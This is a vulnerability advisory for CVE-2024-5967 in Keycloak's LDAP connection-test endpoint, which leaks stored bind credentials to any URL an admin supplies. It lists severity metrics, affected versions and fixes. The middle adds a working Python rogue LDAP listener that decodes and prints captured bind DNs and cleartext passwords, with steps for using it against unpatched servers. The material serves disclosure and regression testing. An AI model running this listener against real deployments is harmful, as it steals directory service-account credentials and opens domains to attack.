Keycloak LDAP Endpoint: Admin Can Flip Connection URL to Steal Bind Creds
CVE-2024-5967 Published on June 18, 2024

Keycloak: leak of configured LDAP bind credentials through the Keycloak admin console

A vulnerability was found in Keycloak. The LDAP testing endpoint (the "test connection" / "test authentication" action in the LDAP user-federation settings of the admin console) allows the Connection URL to be changed independently, without re-entering the currently configured LDAP bind credentials. This lets an attacker with admin access (the manage-realm permission) point the LDAP host URL ("Connection URL") at a machine they control. The Keycloak server connects to the attacker's host and attempts to bind with the stored credentials, thereby leaking them. As a consequence, an attacker who has compromised the admin console, or a user with sufficient privileges, can obtain directory (domain) service-account credentials and use them to attack the domain.
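What the attacker-controlled host actually receives is a plain LDAP simple bind: the stored bind DN and password in cleartext. The following listener, an added example that is not Keycloak code or part of the original page, decodes that BindRequest (BER per RFC 4511) and logs the credential, then answers invalidCredentials so the client closes cleanly. The hostname, port 3389, the bind DN and the password in the sample are constructed for illustration; nothing about Keycloak's own behaviour is assumed beyond what the advisory states (it connects to the supplied URL and binds with the configured credentials).

```python
"""Rogue LDAP listener: decodes the simple bind that a Keycloak LDAP connection
test sends to whatever Connection URL the caller supplied.
Added example, not Keycloak code; hosts, ports and credentials are constructed."""
import socketserver

# Tags from RFC 4511 (LDAP) and X.690 (BER)
TAG_SEQUENCE, TAG_INTEGER, TAG_OCTET_STRING, TAG_ENUMERATED = 0x30, 0x02, 0x04, 0x0A
TAG_BIND_REQUEST, TAG_BIND_RESPONSE = 0x60, 0x61   # [APPLICATION 0] / [APPLICATION 1]
TAG_AUTH_SIMPLE, TAG_AUTH_SASL = 0x80, 0xA3        # AuthenticationChoice [0] / [3]
INVALID_CREDENTIALS = 49

def ber_int(value: int) -> bytes:
    """Two's-complement big-endian INTEGER content of minimal length."""
    return value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True)

def ber_tlv(tag: int, content: bytes) -> bytes:
    """Encode one definite-length BER TLV (short or long length form)."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content

def ber_read(buf: bytes, pos: int = 0):
    """Decode the TLV at buf[pos]; return (tag, content, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        n = first
    else:
        k = first & 0x7F
        if k == 0 or k > 4 or pos + k > len(buf):
            raise ValueError("unsupported or truncated BER length")
        n = int.from_bytes(buf[pos:pos + k], "big")
        pos += k
    if pos + n > len(buf):
        raise ValueError("truncated TLV content")
    return tag, buf[pos:pos + n], pos + n

def parse_bind_request(pdu: bytes) -> dict:
    """Return messageID, version, bind DN and, for simple auth, the cleartext password."""
    tag, msg, _ = ber_read(pdu)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, mid, pos = ber_read(msg)
    if tag != TAG_INTEGER:
        raise ValueError("missing messageID")
    tag, op, _ = ber_read(msg, pos)
    if tag != TAG_BIND_REQUEST:
        raise ValueError(f"not a BindRequest (tag 0x{tag:02x})")
    _, ver, pos = ber_read(op)
    _, name, pos = ber_read(op, pos)
    tag, auth, _ = ber_read(op, pos)
    if tag == TAG_AUTH_SIMPLE:
        method, secret = "simple", auth.decode("utf-8", "replace")
    elif tag == TAG_AUTH_SASL:
        method, secret = "sasl", None        # nothing reusable sent in the clear
    else:
        raise ValueError(f"unknown AuthenticationChoice 0x{tag:02x}")
    return {"message_id": int.from_bytes(mid, "big", signed=True),
            "version": int.from_bytes(ver, "big", signed=True),
            "bind_dn": name.decode("utf-8", "replace"),
            "method": method, "password": secret}

def build_bind_request(message_id: int, bind_dn: str, password: str) -> bytes:
    """Encode a simple BindRequest as an LDAP client sends it (used for the sample)."""
    op = (ber_tlv(TAG_INTEGER, ber_int(3)) + ber_tlv(TAG_OCTET_STRING, bind_dn.encode())
          + ber_tlv(TAG_AUTH_SIMPLE, password.encode()))
    return ber_tlv(TAG_SEQUENCE, ber_tlv(TAG_INTEGER, ber_int(message_id))
                   + ber_tlv(TAG_BIND_REQUEST, op))

def build_bind_response(message_id: int, result_code: int) -> bytes:
    """BindResponse with empty matchedDN/diagnosticMessage so the client closes cleanly."""
    op = (ber_tlv(TAG_ENUMERATED, ber_int(result_code))
          + ber_tlv(TAG_OCTET_STRING, b"") + ber_tlv(TAG_OCTET_STRING, b""))
    return ber_tlv(TAG_SEQUENCE, ber_tlv(TAG_INTEGER, ber_int(message_id))
                   + ber_tlv(TAG_BIND_RESPONSE, op))

class CaptureHandler(socketserver.BaseRequestHandler):
    """Log the first PDU of every connection, then answer invalidCredentials."""
    def handle(self):
        data = self.request.recv(65536)
        try:
            req = parse_bind_request(data)
        except ValueError as exc:
            print(f"[{self.client_address[0]}] not a bind request: {exc}")
            return
        print(f"[{self.client_address[0]}] bind_dn={req['bind_dn']!r} "
              f"method={req['method']} password={req['password']!r}")
        self.request.sendall(build_bind_response(req["message_id"], INVALID_CREDENTIALS))

if __name__ == "__main__":
    # Constructed sample: the bind a test against ldap://listener.example:3389 would send
    print(parse_bind_request(build_bind_request(1, "cn=keycloak-svc,dc=example,dc=org", "Hunter2!")))
    with socketserver.ThreadingTCPServer(("0.0.0.0", 3389), CaptureHandler) as srv:
        srv.serve_forever()  # stop with Ctrl-C
```

Run the script on a host you control, then, against an unpatched build, open the LDAP provider in the admin console, change Connection URL to ldap://<that host>:3389, leave the bind credential field masked and trigger the test: the listener prints the stored bind DN and password. The same listener doubles as a regression check after upgrading: on a fixed version the test should not reach the listener with a bind unless the credential was re-entered. Because the bind arrives in cleartext over plain ldap://, egress filtering from the Keycloak host to anything other than the approved directory servers is a worthwhile compensating control while patching.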

References: Github Repository, Vendor Advisory, NVD

Vulnerability Analysis

CVE-2024-5967 is exploitable over the network and requires high privileges: the attacker must already hold a Keycloak account with the manage-realm permission, or a compromised admin session. Attack complexity is low and no user interaction is needed. The direct impact is limited to confidentiality (disclosure of the configured LDAP bind credentials); the metrics below assign no integrity or availability impact. Together they correspond to the CVSS 3.1 vector AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N, a base score of 2.7 (Low). The downstream impact can be larger than that score suggests: the leaked credential is usually a directory service account, so the real damage depends on what that account is allowed to do in the domain.

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: NONE
Availability Impact: NONE

Timeline

Reported to Red Hat.

Made public.

Weakness Type

Incorrect Default Permissions (CWE-276)

The generic CWE description reads: "During installation, installed file permissions are set to allow anyone to modify those files." As it applies to this CVE, the weakness is that the LDAP connection-test endpoint reused the stored bind credential for any Connection URL the caller supplied, instead of requiring the credential to be re-entered once the URL differed from the saved configuration.


Products Associated with CVE-2024-5967

Keycloak (the org.keycloak:keycloak-ldap-federation module; affected and fixed versions are listed under Vulnerable Packages).

Vulnerable Packages

The following package name and versions may be associated with CVE-2024-5967:

Package Manager | Vulnerable Package                    | Versions              | Fixed In
maven           | org.keycloak:keycloak-ldap-federation | >= 23.0.0, <= 24.0.5  | 24.0.6
maven           | org.keycloak:keycloak-ldap-federation | <= 22.0.11            | 22.0.12
maven           | org.keycloak:keycloak-ldap-federation | = 25.0.0              | 25.0.1

In practice this means upgrading to 22.0.12, 24.0.6 or 25.0.1 (or a later release of the same line).

Exploit Probability

EPSS
0.13%
Percentile
32.85%

EPSS (Exploit Prediction Scoring System) scores estimate the probability that a vulnerability will be exploited in the wild within the next 30 days. The percentile shows you how this score compares to all other vulnerabilities.